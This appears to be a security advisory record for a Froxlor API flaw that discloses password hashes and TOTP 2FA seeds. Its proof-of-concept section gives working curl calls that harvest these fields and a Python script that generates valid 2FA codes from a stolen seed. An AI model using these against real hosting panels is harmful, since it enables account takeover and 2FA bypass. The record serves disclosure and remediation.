{"id":"CVE-2026-62988","aliases":[],"url":"https://o3.security/vulnerability/CVE-2026-62988","summary":"Froxlor: Credential and 2FA secret disclosure via Froxlor API endpoints","details":"## Summary\n\nSeveral Froxlor API command classes return sensitive authentication material in JSON API responses. The affected endpoints retrieve full database rows using `SELECT *`, `SELECT alias.*`, or equivalent full-row queries, then return the results directly through `$this->response(...)` without removing credential-related fields.\n\nThe exposed fields include password hashes for customers, administrators, and FTP users, as well as TOTP 2FA seed material for administrator and customer accounts.\n\nThis exposes credential-equivalent data to API clients that should not receive it. Password hashes can be cracked offline and reused for account takeover, while exposed TOTP seeds allow generation of valid 2FA codes for affected accounts. When both a password hash and TOTP seed are exposed for the same account, the vulnerability can defeat both authentication factors if the password hash is cracked or the password is otherwise obtained.\n\n## Details\n\nThe affected API classes retrieve entire database rows and return them without filtering sensitive fields:\n\n### `lib/Froxlor/Api/Commands/Customers.php`\n\n`Customers.get()` and `Customers.listing()` select and return customer rows containing sensitive fields, including:\n\n* `password`\n* `type_2fa`\n* `data_2fa`\n\nWhen `type_2fa = 2`, the `data_2fa` value represents the Base32-encoded TOTP seed used by the customer's authenticator application.\n\nThe result is returned through `$this->response($result)` or `$this->response(['list' => $result])` without removing these fields.\n\n### `lib/Froxlor/Api/Commands/Admins.php`\n\n`Admins.get()` and `Admins.listing()` return administrator rows containing sensitive fields, including:\n\n* `password`\n* `type_2fa`\n* `data_2fa`\n\nWhen `type_2fa = 2`, the `data_2fa` value represents the Base32-encoded TOTP seed used by the administrator's authenticator application.\n\nThese fields are not stripped before returning the API response.\n\n### `lib/Froxlor/Api/Commands/Ftps.php`\n\n`Ftps.get()` and `Ftps.listing()` return FTP user rows containing:\n\n* `password`\n\nThe password field is not stripped before returning the API response.\n\nThis behavior appears inconsistent with Froxlor's existing safe response patterns. For example, other API command classes explicitly remove password-related fields before returning responses. This indicates that credential material and sensitive internal fields are already treated as non-response data in other parts of the product.\n\n## Proof of Concept\n\n### Preconditions\n\n* Froxlor API is enabled.\n* A valid API key and secret exist for an account allowed to call the affected API endpoints.\n* At least one customer or administrator account exists with TOTP 2FA enabled.\n* For `Admins.*`, the API account must have the required permission to call the affected administrator endpoint.\n\nSet variables:\n\n```bash\nexport FROXLOR_BASE='https://froxlor.example.com'\nexport API_KEY='<api_key>'\nexport API_SECRET='<api_secret>'\n```\n\n### PoC 1: Customer password hash and TOTP seed exposure\n\n```bash\ncurl -k -sS -u \"$API_KEY:$API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -X POST \\\n  -d '{\"command\":\"Customers.listing\",\"params\":{}}' \\\n  \"$FROXLOR_BASE/api.php\" | jq '.data.list[] | {customerid, loginname, password, type_2fa, data_2fa, email}'\n```\n\nExample vulnerable response:\n\n```json\n{\n  \"customerid\": 1,\n  \"loginname\": \"customer1\",\n  \"password\": \"$2y$12$REDACTED_HASH_VALUE...\",\n  \"type_2fa\": 2,\n  \"data_2fa\": \"REDACTED_BASE32_TOTP_SEED\",\n  \"email\": \"customer@example.com\"\n}\n```\n\nThe same issue can be verified with `Customers.get`:\n\n```bash\ncurl -k -sS -u \"$API_KEY:$API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -X POST \\\n  -d '{\"command\":\"Customers.get\",\"params\":{\"id\":1}}' \\\n  \"$FROXLOR_BASE/api.php\"\n```\n\n### PoC 2: Administrator password hash and TOTP seed exposure\n\n```bash\ncurl -k -sS -u \"$API_KEY:$API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -X POST \\\n  -d '{\"command\":\"Admins.listing\",\"params\":{}}' \\\n  \"$FROXLOR_BASE/api.php\" | jq '.data.list[] | {adminid, loginname, password, type_2fa, data_2fa}'\n```\n\nExample vulnerable response:\n\n```json\n{\n  \"adminid\": 1,\n  \"loginname\": \"admin\",\n  \"password\": \"$2y$12$REDACTED_HASH_VALUE...\",\n  \"type_2fa\": 2,\n  \"data_2fa\": \"REDACTED_BASE32_TOTP_SEED\"\n}\n```\n\nThe same issue can be verified with `Admins.get`:\n\n```bash\ncurl -k -sS -u \"$API_KEY:$API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -X POST \\\n  -d '{\"command\":\"Admins.get\",\"params\":{\"id\":1}}' \\\n  \"$FROXLOR_BASE/api.php\"\n```\n\n### PoC 3: FTP password hash exposure\n\n```bash\ncurl -k -sS -u \"$API_KEY:$API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -X POST \\\n  -d '{\"command\":\"Ftps.listing\",\"params\":{}}' \\\n  \"$FROXLOR_BASE/api.php\" | jq '.data.list[] | {id, username, password}'\n```\n\nExample vulnerable response:\n\n```json\n{\n  \"id\": 1,\n  \"username\": \"customer1\",\n  \"password\": \"$2y$12$REDACTED_HASH_VALUE...\"\n}\n```\n\nThe same issue can be verified with `Ftps.get`:\n\n```bash\ncurl -k -sS -u \"$API_KEY:$API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -X POST \\\n  -d '{\"command\":\"Ftps.get\",\"params\":{\"id\":1}}' \\\n  \"$FROXLOR_BASE/api.php\"\n```\n\n### PoC 4: Generate a valid TOTP code from the exposed seed\n\nIf `type_2fa = 2`, the exposed `data_2fa` value can be used to generate valid TOTP codes for the affected account.\n\n```bash\nexport TOTP_SEED='<base32_totp_seed_from_data_2fa>'\n\npython3 - <<'PY'\nimport base64\nimport hashlib\nimport hmac\nimport os\nimport struct\nimport time\n\nseed = os.environ[\"TOTP_SEED\"].replace(\" \", \"\").upper()\nkey = base64.b32decode(seed + \"=\" * ((8 - len(seed) % 8) % 8))\n\ncounter = int(time.time() // 30)\nmsg = struct.pack(\">Q\", counter)\n\ndigest = hmac.new(key, msg, hashlib.sha1).digest()\noffset = digest[-1] & 0x0F\ncode = struct.unpack(\">I\", digest[offset:offset + 4])[0] & 0x7fffffff\n\nprint(str(code % 1000000).zfill(6))\nPY\n```\n\nThe generated six-digit value is a valid TOTP code for the affected account during the current TOTP time window.\n\n### Expected behavior\n\nAPI responses should never include password hashes, TOTP seeds, or other credential-equivalent authentication material in normal `get` or `listing` responses.\n\nAt minimum, the following fields should be omitted or redacted before returning API responses:\n\n* `password`\n* `data_2fa`\n* any future credential-equivalent secret fields\n\n## Impact\n\nAn authenticated API user can retrieve credential material for accounts visible through the affected endpoints.\n\nFor password hashes, an attacker can perform offline cracking. If a weak or reused password is recovered, the attacker can authenticate as the affected customer, administrator, or FTP user. This may lead to unauthorized access to the hosting panel, FTP file access, hosted website modification, mail or database management, and lateral movement inside a shared-hosting environment.\n\nFor TOTP 2FA seeds, an attacker can generate valid one-time codes for affected administrator or customer accounts. TOTP seeds are long-lived secrets and remain valid until 2FA is reset. Exposure of `data_2fa` therefore weakens or bypasses the second authentication factor for affected accounts.\n\nThe combined impact is especially severe when both `password` and `data_2fa` are exposed for the same administrator or customer account. In that case, an attacker can attempt to crack the password hash offline and then use the exposed TOTP seed to generate valid 2FA codes, defeating both factors of authentication.\n\nAdministrator credential material is particularly sensitive because compromise of an administrator account may allow privileged panel actions and access to server-level or customer-level hosting configuration. Customer and FTP credential material is also sensitive because it may allow unauthorized access to hosted content and account-specific resources.\n\n## Remediation\n\nAPI responses should be built from explicit allowlists of safe response fields instead of returning full database rows. Sensitive fields such as `password` and `data_2fa` should never be included in normal `get` or `listing` responses.\n\nAs a tactical fix, remove or redact credential-equivalent fields before calling `$this->response(...)` in the affected API command classes.\n\nAs an architectural fix, introduce centralized response serialization for API models so that sensitive fields are consistently excluded across all endpoints. This should include password hashes, TOTP seeds, recovery secrets, API secrets, tokens, private keys, and any future authentication material.\n\nBecause TOTP seeds may have been exposed, affected installations should consider requiring 2FA reset or rotation for accounts whose `data_2fa` values may have been returned through vulnerable API responses.","published":"2026-08-18T20:48:35Z","modified":"2026-08-18T21:00:07.850048315Z","cvss":{"score":9,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L"},"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"Packagist","name":"froxlor/froxlor","fixedVersion":"2.3.8"}],"fix":{"url":"https://github.com/froxlor/froxlor/commit/52a43fb826bb9a058faf9c39feeef7ac4444ceba","label":"froxlor/froxlor@52a43fb"},"references":[{"type":"WEB","url":"https://github.com/froxlor/froxlor/security/advisories/GHSA-7788-ghfq-c6mh"},{"type":"WEB","url":"https://github.com/froxlor/froxlor/commit/52a43fb826bb9a058faf9c39feeef7ac4444ceba"},{"type":"WEB","url":"https://github.com/froxlor/froxlor/commit/8667fa3a4d77d6e322b7b8f7b9edbc1613ab5797"},{"type":"PACKAGE","url":"https://github.com/froxlor/froxlor"},{"type":"WEB","url":"https://github.com/froxlor/froxlor/releases/tag/2.3.8"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-18T21:00:07.850048315Z"}}